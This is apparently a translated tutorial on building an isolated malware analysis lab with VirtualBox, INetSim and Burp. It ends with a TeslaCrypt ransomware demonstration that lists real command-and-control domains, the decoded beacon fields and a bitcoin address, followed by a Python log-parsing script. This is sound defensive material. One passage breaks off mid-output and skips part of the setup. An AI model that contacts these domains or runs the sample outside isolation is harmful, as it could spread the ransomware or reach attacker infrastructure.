2025-04-04 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/02 Report--
This article explains how to use VirtualBox, INetSim and Burp to build your own malware analysis lab. It is quite detailed and should serve as a useful reference; if you are interested, read on!
We will build an experimental environment for malware analysis using VirtualBox, INetSim and Burp. The environment is isolated from both the host operating system and the Internet and forms a separate virtual network. We set up two victim virtual machines (Ubuntu and Windows 7) and an analysis server that simulates common Internet services such as HTTP and DNS, so that we can record and analyze the network traffic of any Linux or Windows malware. The malware will unknowingly connect to our server instead of the Internet. Finally, we take the infamous TeslaCrypt ransomware as an example: a now-defunct ransomware family that infected a large number of systems from 2015 to mid-2016.
1. Create a virtual machine
The following two links can be used to download the Ubuntu and Windows 7 virtual machine images.
Ubuntu (victim machine 1 and analyzer): download Ubuntu 16.10 64-bit from OsBoxes (direct download link)
Windows 7 (victim machine 2): download from Microsoft Developer Website (select IE 11 on Win 7 (x86) and VirtualBox)
Tip: if you already have an unused Ubuntu virtual machine, just clone it and reuse it in the next steps (right-click > Clone).
Before you begin, make sure you have enough disk space available (my advice is at least 10-20 GB).
Ubuntu basic setup
OsBoxes provides a plug-and-play virtual disk that we can use straight away by attaching it to a new machine. First, extract the file we just downloaded:
$ 7za e Ubuntu_16.10_Yakkety-VB-64bit.7z
After unzipping, you will get a virtual disk VDI file. We will start with the basic setup of the Ubuntu image and then clone our two Ubuntu virtual machines.
In VirtualBox, create a new machine (click the New button) and name it Ubuntu analysis (Analyzer). Then select the amount of RAM to assign. VirtualBox will then ask whether you want to create a new virtual hard disk or use an existing one. Select "Use an existing virtual hard disk file", click the folder icon to the right of the drop-down list, and select our VDI file.
Then we start the virtual machine. The default password is osboxes.org.
Basic settings
The default keyboard uses a QWERTY layout. If you are not used to it, you can change it through Settings > Text Entry.
In addition, you can change the default password using the following command:
$ passwd osboxes
Update the package:
$ sudo apt-get update
$ sudo apt-get upgrade
Install guest additions
Select Devices > Insert Guest Additions CD image from the menu of the window in which the VM is running. You will then be asked whether you want to run the installer; accept and enter the password (osboxes.org unless you changed it). After the installation completes, shut down the VM.
Clone
Now that you have a basic Ubuntu VM, clone it (right-click it in the VirtualBox main window > Clone). Name the clone Ubuntu victim and tick the check box to reinitialize its MAC address. Choose Full clone as the clone type so that the clone gets its own copy of the disk.
Windows 7 basic setup
The download link given earlier points to a ZIP archive containing an OVA file. Unlike a VDI file, an OVA is not just a virtual disk but a complete description of a virtual machine (including its virtual disk), so the only thing we need to do to create a VM from it is to select File > Import Appliance in the VirtualBox main window. If you have enough memory, give it at least 1024 MB of RAM.
After the import completes (this may take a few minutes), rename the machine to Windows 7 victim and start it.
Install guest additions
Select Devices > Insert Guest Additions CD image from the menu of the window in which the VM is running, then run the installer from the inserted virtual CD. After the installation completes, shut down the VM.
2. Setting up the analyzer: INetSim and Burp
INetSim
INetSim is a very convenient and powerful utility that simulates a whole set of standard Internet services on a single machine. By default it simulates DNS, HTTP and SMTP, among others, and its behaviour is easy to adjust. Since we will later configure the victim machines without Internet access, INetSim will stand in for the services the malware expects to reach.
There are several ways to install INetSim, and the easiest way is to run the following command to install it (in the analyzer).
$ sudo su
# echo "deb http://www.inetsim.org/debian/ binary/" > /etc/apt/sources.list.d/inetsim.list
# wget -O - http://www.inetsim.org/inetsim-archive-signing-key.asc | apt-key add -
# apt update
# apt install inetsim
Note: to copy and paste these commands into the analyzer, enable Devices > Shared Clipboard > Bidirectional in the VM window.
We will discuss how to use INetSim later.
Burp
INetSim is powerful, but its SSL support is very limited. It ships with a single certificate for one host (inetsim.org) and cannot generate SSL certificates dynamically. This is a problem for us because most malware today encrypts its communication with SSL. We will therefore use Burp as a transparent SSL proxy sitting between the victim machines and INetSim to intercept SSL traffic. Of course, you can skip Burp if you do not need to intercept SSL traffic right now.
Burp generates SSL certificates on the fly for any host the victim machines connect to. It also creates a single CA certificate, which we will import into the victim machines later. This way we can intercept the encrypted traffic the malware sends.
You can download Burp from the official website. The download is a bash installation script that you run to install Burp:
$ bash ~/Downloads/burpsuite_free_linux_v1_7_23.sh
By default, the Burp executable is ~/BurpSuiteFree/BurpSuiteFree.
3. Set up an isolated virtual network
We are going to build an isolated network of three virtual machines with no Internet access. In addition, we want the analyzer to act as the network gateway of the victim machines, so that it can intercept their network traffic and simulate services such as DNS or HTTP.
To achieve this goal, we will use the VirtualBox internal network. For those familiar with VirtualBox, the difference between an internal network and a host-only network is that the internal network does not have access to the host at all.
For each of the three virtual machines, do the following:
Open its settings
Go to the "Network" section
Change the "Attached to" field to Internal Network
Enter malware analysis network as the network name
Analysis machine
Start the analyzer, open a terminal and run the ifconfig command. You should see an interface called enp0s3. If your interface has a different name, substitute it in the instructions below.
Open the file /etc/network/interfaces as root and add the following at the end:
auto enp0s3
iface enp0s3 inet static
    address 10.0.0.1
    netmask 255.255.255.0
This will assign static IP 10.0.0.1 to the machine on our virtual network. Now that we have configured the network interface, we use the following command to start it:
$ sudo ifup enp0s3
Ubuntu victim machine
The process here is very similar, except that we assign the static IP 10.0.0.2 and tell the machine to use 10.0.0.1 as its gateway and DNS server. Append the following to the end of /etc/network/interfaces:
auto enp0s3
iface enp0s3 inet static
    address 10.0.0.2
    gateway 10.0.0.1
    netmask 255.255.255.0
    dns-nameservers 10.0.0.1
And run:
$ sudo ifup enp0s3
$ sudo service networking restart
Now you should be able to ping the analyzer:
$ ping 10.0.0.1
PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=0.480 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=0.526 ms
Windows 7 victim machine
Right-click the network icon in the taskbar (or go to Start menu > Control Panel > Network and Internet > Network and Sharing Center), click Local Area Connection 2 > Properties, select Internet Protocol Version 4, and click the Properties button.
We assign the static IP 10.0.0.3 to this machine; the rest of the configuration (gateway and DNS server) is the same as for the Ubuntu victim machine.
Be sure to confirm the settings (click OK, Apply, etc. until all settings windows are closed). You should now be able to ping the analyzer:
> ping 10.0.0.1
Pinging 10.0.0.1 with 32 bytes of data:
Reply from 10.0.0.1: bytes=32 time
Project options > Save project options completes this operation.
Let's make sure the current setup works. Start INetSim and run:
$ curl --insecure https://localhost
You should get the following:
INetSim default HTML page
This is the default HTML page for INetSim HTTP server fake mode.
This file is an HTML document.
Import Burp's CA certificate on the victim machines
Start the Windows 7 victim machine and try to browse to an HTTPS URL (for example, https://github.com). You will see a warning similar to the following:
This is because the SSL certificate generated by Burp, signed by Burp's own CA certificate, is not trusted by the victim machine.
In Burp, add a new proxy listener on port 8080 bound to all interfaces (Proxy tab > Options > Add button):
Then, from the victim's machine, browse to http://10.0.0.1:8080.
Click CA Certificate in the upper right corner to download the Burp CA certificate.
On the Windows 7 victim machine: open the file, click Install Certificate > Next > Place all certificates in the following store: Trusted Root Certification Authorities > Next.
On the Ubuntu victim machine:
Convert the certificate to the appropriate format (.crt, PEM):
$ openssl x509 -in ~/Downloads/cacert.der -inform DER -out burp.crt
Copy it to /usr/local/share/ca-certificates:
$ sudo cp burp.crt /usr/local/share/ca-certificates/
And run:
$ sudo update-ca-certificates
By default, Firefox does not use the system certificate store. If you want SSL connections to work in Firefox, go to Advanced > Certificates > Import in the Firefox settings, select burp.crt and tick the box to trust this CA to identify websites.
Setup complete!
After importing Burp's CA certificate into the victim machines, be sure to take a new snapshot (for example, "Clean state, Burp CA certificate installed").
6. Set up a shared folder between the analyzer and the host system
Sometimes you need to transfer files to the analyzer or to a victim machine; for convenience, we can set up a shared folder.
In the VirtualBox window running the analyzer, go to Devices > Shared Folders > Shared Folders Settings. Create a new shared folder, select the host folder you want to map and give it a name. Tick the check box to make it permanent.
Now mount the shared folder on the analyzer:
$ mkdir ~/malware-analysis-share
$ sudo mount -t vboxsf -o uid=$UID,gid=$(id -g) malware-analysis-share ~/malware-analysis-share
Transfer the file to the victim's machine
At some point you will probably need to transfer files (such as malware samples) to a victim machine. Setting up a shared folder for the victim machines is a bad idea, because the victim machine, and therefore the malware sample running on it, would have access to the host folder.
The easiest way to transfer files to the Ubuntu victim machine is netcat. Here is a simple example:
# Receiving machine (IP 10.0.0.2)
$ nc -lvp 4444 > file.exe
# Analysis machine (sender)
$ cat file_to_transfer.exe | nc 10.0.0.2 4444
Unfortunately, Windows has no netcat available by default. One option is to let INetSim serve the file to the victim machine:
# inetsim.conf
# Remove the default line:
http_fakefile exe sample_gui.exe x-msdos-program
# Replace it by:
http_fakefile exe file_to_transfer.exe x-msdos-program
# And put file_to_transfer.exe in ./data/http/fakefiles
With this configuration, simply browse to any URL that ends with ".exe" (for example, http://github.com/file.exe).
7. Demo: TeslaCrypt ransomware
I downloaded a sample of the TeslaCrypt ransomware, transferred it to the Windows 7 victim machine and executed it. A few seconds later, all files in the VM were encrypted and the following window popped up.
Checking the INetSim log, we can see that the ransomware performs the following DNS lookups:
7tno4hib47vlep5o.tor2web.org
7tno4hib47vlep5o.tor2web.blutmagie.de
7tno4hib47vlep5o.tor2web.fi
bitcoin.toshi.io
It then sends several HTTPS requests to these domains:
HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.org/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh7a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzA=
HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.blutmagie.de/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh7a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzE=
HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.fi/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh7a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzI=
HTTPS connection, method: GET, URL: https://bitcoin.toshi.io/api/v0/addresses/1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT
The requests go through tor2web.org, tor2web.blutmagie.de and tor2web.fi. These are tor2web gateways, which give access to Tor hidden services without installing Tor Browser or a similar tool.
The malware is therefore contacting the Tor hidden service 7tno4hib47vlep5o.onion, which is probably some kind of C&C (command-and-control) server. The request payload is a base64-encoded string, which decodes to:
Subject=Ping&key=15B38B18AF20C0DB2A7C771E014363F2CB8781B156D519CC5F220335D4714AA3&addr=1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT&files=0&size=0&version=0.2.6a&date=1496648675&OS=7601&ID=16&subid=0&gate=G1
It also makes an API call to bitcoin.toshi.io, probably to check whether the ransom has been paid to the bitcoin address 1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT. That address has no recorded transactions, so the malware appears to generate a unique bitcoin address for each infected computer.
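The beacon decoding above can be automated against the INetSim log. The following Python script is an added example, not part of the original article: it parses INetSim "HTTPS connection" lines into structured indicators, recognises tor2web gateway hostnames and recovers the .onion name behind them, and base64-decodes the state.php query into its fields. The sample log is constructed: one beacon re-encoded from the decoded query shown above, plus the bitcoin.toshi.io balance check.

```python
"""Turn INetSim HTTPS log lines from the TeslaCrypt demo into structured indicators."""
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlparse

# Constructed sample input (not a real capture): the blutmagie.de beacon, re-encoded
# from the decoded query in the article, and the bitcoin address lookup.
SAMPLE_LOG = """\
HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.blutmagie.de/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh6a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzE=
HTTPS connection, method: GET, URL: https://bitcoin.toshi.io/api/v0/addresses/1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT
"""

# INetSim log format as seen in the article: "... method: GET, URL: https://..."
LINE_RE = re.compile(r"method: (?P<method>[A-Z]+), URL: (?P<url>\S+)")
# tor2web gateways expose a hidden service as <onion-name>.tor2web.<gateway-domain>
TOR2WEB_RE = re.compile(r"^(?P<onion>[a-z2-7]{16,56})\.tor2web\.(?P<gateway>[\w.-]+)$")


def decode_beacon(query):
    """Base64-decode a state.php query and split it into key/value fields.
    Returns None if the query is not valid base64 (strict alphabet check)."""
    try:
        raw = base64.b64decode(query, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return dict(parse_qsl(raw, keep_blank_values=True))


def parse_line(line):
    """Extract host, tor2web/onion details and the decoded beacon from one log line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    u = urlparse(m.group("url"))
    rec = {"method": m.group("method"), "host": u.hostname, "path": u.path,
           "onion": None, "gateway": None, "beacon": None}
    t = TOR2WEB_RE.match(u.hostname or "")
    if t:  # request is proxied through a tor2web gateway to a hidden service
        rec["onion"] = t.group("onion") + ".onion"
        rec["gateway"] = "tor2web." + t.group("gateway")
    if u.path.endswith("state.php") and u.query:
        rec["beacon"] = decode_beacon(u.query)  # whole query string is the payload
    return rec


def parse_log(text):
    """Parse every recognised request line in an INetSim log excerpt."""
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]
```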